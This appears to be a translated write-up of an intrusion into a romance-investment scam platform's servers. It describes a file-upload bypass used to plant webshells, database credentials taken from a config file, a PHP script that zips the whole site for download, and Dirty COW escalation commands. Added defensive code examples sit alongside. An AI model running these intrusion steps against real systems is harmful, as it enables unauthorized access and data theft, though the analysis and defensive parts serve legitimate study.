The so-called "pig-butchering" scam (literally "killing pig plate") is an online fraud in which scammers use online dating, usually posing as a member of the opposite sex, to induce victims to download scam apps and make various "investments" in them, such as gambling, stocks, futures and even cryptocurrencies. This year Xiaobai fell for exactly this kind of scheme: he was added on QQ by an account named "Heart", told to download the "Heart" app, and there met a pretty woman calling herself "Teacher xx". Taken in by her photos and hoping to meet his online friend, Xiaobai was then talked into downloading another app called "Midnight Paradise". Sure enough, he was defrauded of more than 100,000 yuan.
0x01 APP Test Preparation
According to Xiaobai's description, we noted three leads: the QQ account, the "Heart" app and the "Midnight Paradise" app. Xiaobai, however, could not bear having been cheated and had already deleted the scammer's QQ account, so we could not start from the QQ number. The APK packages of the two apps still existed, so we began our analysis there.
Install the APP
Install the two apps in the Nox (夜神) emulator. For convenience, use an Android 5.0 image; otherwise HTTPS packets cannot be captured.
Background: since Android 7.0, an app's default network security configuration no longer trusts CA certificates added by the user, so the packet-capture tool's certificate is not accepted either.
Since the "Midnight Paradise" app requires an invitation code to register, we install the "Heart" app first.
Set up packet capture
In Burp Suite, set the listener address and port; the address is the host's LAN IP.
In the emulator's network settings, set the HTTP proxy to the Burp Suite address and port.
Visit Baidu; the request is captured in Burp Suite.
HTTP packets can now be captured.
Install the certificate
Next, to capture HTTPS traffic, we need to install Burp's CA certificate in the emulator.
Visit https://burp in the emulator's browser.
Click "CA Certificate" to download the certificate.
Open Settings.
Find Security.
Choose "Install from SD card".
Select the downloaded certificate and give it a name.
Under "User credentials" the certificate is now listed.
Go to https://www.baidu.com.
The HTTPS request is captured in Burp Suite.
0x02 Getting a Webshell
Initial look at the upload function
Register a test account in the app.
Find the "Post a moment" function.
It allows a file to be uploaded.
Intercepting the request with Burp Suite, the test showed that the target only returns 0 or 1.
After uploading, the post shows up normally in the moments feed, so where is the corresponding image path?
The image address can be found by capturing the request that loads the image.
If the file name in the request is changed to .php, the upload is rejected, so some defence mechanism may exist.
File upload vulnerability to obtain Webshell
After trying several bypasses without success, I found another upload point in the moments background (cover) image and uploaded a Behinder (冰蝎, "Ice Scorpion") webshell there.
Fortunately the target returned the path of the uploaded file directly, and I connected to it with Behinder.
At this point the webshell is live, but unfortunately this is a Docker environment. To maintain access to the target site, a Godzilla (哥斯拉) webshell was uploaded as well.
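The two upload points above differ only in whether the client-supplied file name is checked, and that check was bypassable. As an added example (not the target site's code, and not from Behinder or Godzilla), here is a hardened PHP image-upload handler for comparison: it sniffs the real content type, requires the bytes to decode as an image, assigns its own random name and extension, and writes to a directory from which the web server is assumed not to execute PHP. The constant names, the upload directory and the form field name `image` are assumptions.

```php
<?php
// Added example (not the target site's code): hardened image-upload handler.
// UPLOAD_DIR is assumed to be a directory the web server never executes PHP from.

declare(strict_types=1);

const UPLOAD_DIR     = '/var/www/uploads';   // assumed path
const MAX_UPLOAD_LEN = 5 * 1024 * 1024;      // 5 MiB cap
const ALLOWED_TYPES  = [                     // sniffed MIME type => extension we assign ourselves
    'image/jpeg' => 'jpg',
    'image/png'  => 'png',
    'image/gif'  => 'gif',
];

/**
 * Validate one $_FILES entry and store it under a server-chosen name.
 * Returns the stored file name, or null if the upload is rejected.
 * The client-supplied name and MIME type are never consulted.
 */
function store_image_upload(array $file, string $dir = UPLOAD_DIR): ?string
{
    if (($file['error'] ?? UPLOAD_ERR_NO_FILE) !== UPLOAD_ERR_OK) {
        return null;
    }
    if ($file['size'] > MAX_UPLOAD_LEN || !is_uploaded_file($file['tmp_name'])) {
        return null;
    }

    // 1. Sniff the content type from the bytes, not from $file['type'] or the name.
    $finfo = new finfo(FILEINFO_MIME_TYPE);
    $mime  = $finfo->file($file['tmp_name']);
    if (!isset(ALLOWED_TYPES[$mime])) {
        return null;
    }

    // 2. Require that the file actually decodes as an image of that type.
    $info = @getimagesize($file['tmp_name']);
    if ($info === false || $info['mime'] !== $mime) {
        return null;
    }

    // 3. Random name plus an extension derived from the sniffed type, so a
    //    name such as "shell.php" or "a.php.jpg" cannot influence the result.
    $name = bin2hex(random_bytes(16)) . '.' . ALLOWED_TYPES[$mime];
    $dest = $dir . '/' . $name;

    if (!move_uploaded_file($file['tmp_name'], $dest)) {
        return null;
    }
    chmod($dest, 0644); // never executable
    return $name;
}

// Keep the "0 or 1" response contract seen on the moments upload (assumed
// field name); the real storage path never leaves the server.
if (isset($_FILES['image'])) {
    echo store_image_upload($_FILES['image']) === null ? '0' : '1';
}
```

Note that a valid image can still carry PHP source in a comment or trailing bytes, so step 2 alone is not a defence; the extension chosen in step 3 and a no-execute upload directory are what actually stop a webshell from running.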
0x03 Information Collection
Viewing the Current Environment
The current user is an ordinary www user who can execute some simple commands.
In the file manager, the site turns out to run on the ThinkPHP framework, so I started looking for its configuration files.
Database Login
The database connection settings were found in the configuration file (the default value for `hostname` was lost in the page capture):

```php
return [
    // database type
    'type'     => Env::get('database.type', 'mysql'),
    // server address (default value missing from the page as captured)
    'hostname' => Env::get('database.hostname', '…'),
    // database name
    'database' => Env::get('database.database', 'netchat'),
    // username
    'username' => Env::get('database.username', 'root'),
    // password
    'password' => Env::get('database.password', 'MysqlNetchatPWD#'),
    // server port
    'hostport' => Env::get('database.hostport', '3305'),
];
```

Since the database could not be reached through Behinder, we uploaded Adminer, set the server address to 192.168.0.59:3305 and entered the account and password above.
Select Database Export in Adminer to package the current database for download directly
Backend address and admin credentials
The database held another surprise: it contained administrator account passwords.
After decoding, the password of admin666 is 123456.
The login address appears in the admin_log table: https://xx.xx.xx.xx/adim888/index/login
Visiting it shows the interface below; only the account, password and Google authenticator code are needed to log in. To avoid tipping off the operators, we did not log in to the backend directly.
Packaging the website
Next, to make analysis easier, the following script was used to package the whole site for download.
```php
<?php
error_reporting(0);

class PHPZip
{
    var $dirInfo      = array("0", "0");
    var $datasec      = array();
    var $ctrl_dir     = array();
    var $eof_ctrl_dir = "\x50\x4b\x05\x06\x00\x00\x00\x00";
    var $old_offset   = 0;

    function createZip($dir, $zipfilename)
    {
        if (@function_exists('gzcompress')) {
            @set_time_limit("0");
            if (is_file($dir)) {
                // single file: add it under its base name
                $fileValue = file_get_contents($dir);
                $filename  = basename($dir);
                $this->addFile($fileValue, "$filename");
            } else {
                // directory: walk it recursively
                $this->dirTree($dir, rtrim($dir, '/') . '/');
            }
            $out = $this->filezip();
            $fp  = fopen($zipfilename, "w");
            fwrite($fp, $out, strlen($out));
            fclose($fp);
            $filesize = filesize($zipfilename);
            if ($filesize < 104857600) {
                echo "create zip success!";
            } else {
                echo "create zip error!";
            }
        }
    }

    // get dir tree: add every file and sub-directory below $directory
    function dirTree($directory, $rootDir)
    {
        $fileDir = $rootDir;
        $myDir   = dir($directory);
        while ($file = $myDir->read()) {
            if (is_dir("$directory/$file") and $file != "." and $file != "..") {
                $this->dirInfo[0]++;
                $rootDir = "$fileDir$file/";
                $this->addFile('', "$rootDir");
                // go on into the sub-folder
                $this->dirTree("$directory/$file", $rootDir);
            } else {
                if ($file != "." and $file != "..") {
                    $this->dirInfo[1]++;
                    $fileValue = file_get_contents("$directory/$file");
                    $this->addFile($fileValue, "$fileDir$file");
                }
            }
        }
        $myDir->close();
    }

    function unix2DosTime($unixtime = 0)
    {
        $timearray = ($unixtime == 0) ? getdate() : getdate($unixtime);
        if ($timearray['year'] < 1980) {
            $timearray['year']    = 1980;
            $timearray['mon']     = 1;
            $timearray['mday']    = 1;
            $timearray['hours']   = 0;
            $timearray['minutes'] = 0;
            $timearray['seconds'] = 0;
        }
        return (($timearray['year'] - 1980) << 25) | ($timearray['mon'] << 21) | ($timearray['mday'] << 16) |
               ($timearray['hours'] << 11) | ($timearray['minutes'] << 5) | ($timearray['seconds'] >> 1);
    }

    function addFile($data, $name, $time = 0)
    {
        $name = str_replace('\\', '/', $name);
        // DOS date/time as a little-endian 32-bit field (replaces the dechex/eval trick)
        $hexdtime = pack('V', $this->unix2DosTime($time));

        // "local file header" segment
        $fr  = "\x50\x4b\x03\x04";
        $fr .= "\x14\x00";                 // ver needed to extract
        $fr .= "\x00\x00";                 // gen purpose bit flag
        $fr .= "\x08\x00";                 // compression method
        $fr .= $hexdtime;                  // last mod time and date
        $unc_len = strlen($data);
        $crc     = crc32($data);
        $zdata   = gzcompress($data);
        $zdata   = substr(substr($zdata, 0, strlen($zdata) - 4), 2); // strip zlib header and trailer
        $c_len   = strlen($zdata);         // measured after stripping, so the length field is right
        $fr .= pack('V', $crc);            // crc32
        $fr .= pack('V', $c_len);          // compressed filesize
        $fr .= pack('V', $unc_len);        // uncompressed filesize
        $fr .= pack('v', strlen($name));   // length of filename
        $fr .= pack('v', 0);               // extra field length
        $fr .= $name;

        // "file data" segment
        $fr .= $zdata;

        // "data descriptor" segment (optional but necessary if archive is not served as file)
        $fr .= pack('V', $crc);            // crc32
        $fr .= pack('V', $c_len);          // compressed filesize
        $fr .= pack('V', $unc_len);        // uncompressed filesize

        // add this entry to array
        $this->datasec[] = $fr;
        $new_offset = strlen(implode('', $this->datasec));

        // now add to central directory record
        $cdrec  = "\x50\x4b\x01\x02";
        $cdrec .= "\x00\x00";                   // version made by
        $cdrec .= "\x14\x00";                   // version needed to extract
        $cdrec .= "\x00\x00";                   // gen purpose bit flag
        $cdrec .= "\x08\x00";                   // compression method
        $cdrec .= $hexdtime;                    // last mod time & date
        $cdrec .= pack('V', $crc);              // crc32
        $cdrec .= pack('V', $c_len);            // compressed filesize
        $cdrec .= pack('V', $unc_len);          // uncompressed filesize
        $cdrec .= pack('v', strlen($name));     // length of filename
        $cdrec .= pack('v', 0);                 // extra field length
        $cdrec .= pack('v', 0);                 // file comment length
        $cdrec .= pack('v', 0);                 // disk number start
        $cdrec .= pack('v', 0);                 // internal file attributes
        $cdrec .= pack('V', 32);                // external file attributes - 'archive' bit set
        $cdrec .= pack('V', $this->old_offset); // relative offset of local header
        $this->old_offset = $new_offset;
        $cdrec .= $name;
        // optional extra field, file comment goes here

        // save to central directory
        $this->ctrl_dir[] = $cdrec;
    }

    function filezip()
    {
        $data    = implode('', $this->datasec);
        $ctrldir = implode('', $this->ctrl_dir);
        return $data . $ctrldir . $this->eof_ctrl_dir .
            pack('v', sizeof($this->ctrl_dir)) . // total # of entries "on this disk"
            pack('v', sizeof($this->ctrl_dir)) . // total # of entries overall
            pack('V', strlen($ctrldir)) .        // size of central dir
            pack('V', strlen($data)) .           // offset to start of central dir
            "\x00\x00";                          // .zip file comment length
    }
}

$zip      = new PHPZip();
$path     = $_GET['path'];
$filename = $_GET['filename'];
if (isset($path) && isset($filename)) {
    $zip->createZip($path, $filename);
} else {
    echo "please input correct path and filename, like <a href=#>http://example.com?path=/home&filename=home.zip</a>";
}
?>
```
IP Address Query
Query the admin login log with a simple SQL statement:

```sql
select distinct ip from yl_admin_log limit 50
```

The login IP addresses of this site are all foreign, so presumably the administrator reaches the backend through a proxy or is located abroad.
Querying the yl_CORE_IP table turned up another IP.
Looking that IP up on ThreatBook (微步) shows it tagged as a malicious address.
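The `select distinct ip` query above is a one-off look at the admin_log table. As an added example (not the site's code), the same idea turned into a standing check a site operator would run: every admin login outside an allowlist of expected ranges is flagged, and so is the first login of an admin from an IP not seen for that account before. The column names `ip`, `admin` and `time`, the allowlisted ranges and the log rows are all constructed for the example.

```php
<?php
// Added example (not the site's code): audit admin logins from log rows.
// Column names, allowlist ranges and the sample rows are assumptions.

declare(strict_types=1);

/** True if the IPv4 address $ip lies inside $cidr, e.g. "10.8.0.0/16". */
function ip_in_cidr(string $ip, string $cidr): bool
{
    [$net, $bits] = explode('/', $cidr, 2);
    $ipLong  = ip2long($ip);
    $netLong = ip2long($net);
    if ($ipLong === false || $netLong === false) {
        return false;
    }
    $bits = (int) $bits;
    $mask = $bits >= 32 ? 0xFFFFFFFF : (0xFFFFFFFF << (32 - $bits)) & 0xFFFFFFFF;
    return ($ipLong & $mask) === ($netLong & $mask);
}

/**
 * One alert string per suspicious row. A row is suspicious when its IP is
 * outside every allowlisted range, or when the IP is seen for the first
 * time for that admin account (after that account has logged in before).
 */
function audit_admin_logins(array $rows, array $allowlist): array
{
    $alerts = [];
    $seen   = []; // admin => set of IPs already encountered
    foreach ($rows as $row) {
        $ip     = $row['ip'];
        $admin  = $row['admin'];
        $inside = false;
        foreach ($allowlist as $cidr) {
            if (ip_in_cidr($ip, $cidr)) {
                $inside = true;
                break;
            }
        }
        if (!$inside) {
            $alerts[] = "{$row['time']} {$admin} login from {$ip}: outside allowlist";
        } elseif (!empty($seen[$admin]) && !isset($seen[$admin][$ip])) {
            $alerts[] = "{$row['time']} {$admin} login from {$ip}: first time seen for this admin";
        }
        $seen[$admin][$ip] = true;
    }
    return $alerts;
}

// Constructed rows in the shape of `select time, admin, ip from yl_admin_log`.
$sampleRows = [
    ['time' => '2021-03-01 09:12:00', 'admin' => 'admin666', 'ip' => '192.168.0.20'],
    ['time' => '2021-03-01 09:40:00', 'admin' => 'admin666', 'ip' => '192.168.0.20'],
    ['time' => '2021-03-02 02:03:00', 'admin' => 'admin666', 'ip' => '203.0.113.77'],
    ['time' => '2021-03-02 02:10:00', 'admin' => 'kefu01',   'ip' => '10.8.0.5'],
    ['time' => '2021-03-03 11:00:00', 'admin' => 'admin666', 'ip' => '192.168.0.31'],
];
$allowlist = ['192.168.0.0/24', '10.8.0.0/16']; // assumed office LAN and VPN ranges

foreach (audit_admin_logins($sampleRows, $allowlist) as $alert) {
    echo $alert, PHP_EOL;
}
```

On the constructed rows this prints two alerts: the 203.0.113.77 login, which is outside both ranges, and the 192.168.0.31 login, which is inside the allowlist but new for admin666. The allowlist check is the one that would have fired on the foreign-IP pattern noted above.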
0x04 Privilege Escalation
Since the current privileges are low, we would still need root inside the Docker environment, but I did not manage to escalate, so a Docker escape to the real host was naturally out of reach. What follows is my record of the failed attempt with Dirty COW.
System Information Collection
```shell
uname -a
cat /etc/issue
```

The operating system is Debian GNU/Linux 10.
Vulnerability query
linuxenum.sh and linux-exploit-suggestor.sh were uploaded, given execute permission and run:

```shell
chmod 777 linuxenum.sh
chmod 777 linux-exploit-suggestor.sh
```
Dirty COW attempt
The output of linux-exploit-suggestor indicated that the Dirty COW vulnerability might be present, so the public PoC was compiled and run:

```shell
gcc cowroot.c -o cowroot -pthread
chmod +x cowroot
./cowroot
```

The failed attempt was not captured in screenshots.
0x05 Fraud Analysis and Warning
Logging in as customer service to check chat history
The database also contains the customer service accounts and passwords; simply decoding the base64 yields the plaintext.
We logged in to a few customer service accounts to have a look.
The scam process
Here we again took Xiaobai as the starting point.
His account was found to be q123456x.
The registration IP confirms that this is the victim's account. However, an attempt to log in found the account locked: islogin is 0 in the database, but the user still cannot log in after it is changed to 1. The administrator's operation log shows that the account had been banned.
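Two credential-storage weaknesses run through this write-up: the admin666 password above was recoverable as 123456, and the customer service passwords were merely base64-encoded, so anyone holding a database dump has them in plaintext. As an added example (not the site's code), here is what the base64 scheme amounts to next to proper storage with PHP's `password_hash()`, plus a migrate-on-login routine that replaces a legacy base64 value with a real hash the next time the user authenticates successfully. The function names and the sample values are assumptions.

```php
<?php
// Added example (not the site's code): reversible base64 "protection" versus
// password_hash(), with a migrate-on-login path for legacy rows.

declare(strict_types=1);

/** The scheme seen in the customer-service table: encoding, not hashing. */
function base64_password_recover(string $stored): string
{
    // A reader of the database gets the password back in one call.
    return base64_decode($stored, true) ?: '';
}

/** Correct storage: salted, deliberately slow hash that cannot be reversed. */
function make_password_record(string $password): string
{
    return password_hash($password, PASSWORD_DEFAULT);
}

function check_password(string $password, string $stored): bool
{
    return password_verify($password, $stored);
}

/**
 * Migration on login. If the stored value is already a password_hash()
 * result, verify it. If it is a legacy base64 value, verify by decoding and,
 * on success, hand back a proper hash for the caller to write to the row.
 * Returns [loginOk, valueToStore].
 */
function login_and_migrate(string $password, string $stored): array
{
    $info = password_get_info($stored);
    // 'algo' is 0 (PHP 7) or null (PHP 8) for strings that are not a known hash
    if ($info['algo'] !== null && $info['algo'] !== 0) {
        return [check_password($password, $stored), $stored];
    }
    if (hash_equals(base64_password_recover($stored), $password)) {
        return [true, make_password_record($password)];
    }
    return [false, $stored];
}

// Constructed sample: a legacy row holding base64("123456"), then the migrated row.
$legacy = base64_encode('123456'); // "MTIzNDU2", which is the password for anyone who can read the table
[$ok, $migrated] = login_and_migrate('123456', $legacy);
echo $ok ? "legacy login ok, row migrated to {$migrated}" : 'login failed', PHP_EOL;
[$ok2, $same] = login_and_migrate('123456', $migrated);
echo ($ok2 && $same === $migrated) ? 'hashed login ok, row unchanged' : 'hash check failed', PHP_EOL;
echo check_password('wrong', $migrated) ? 'unexpected' : 'wrong password rejected', PHP_EOL;
```

The migration only fires after a successful login, which is why weak passwords such as 123456 still need a policy check at that same point; hashing makes a dump far less useful, but it does not make a guessable password strong.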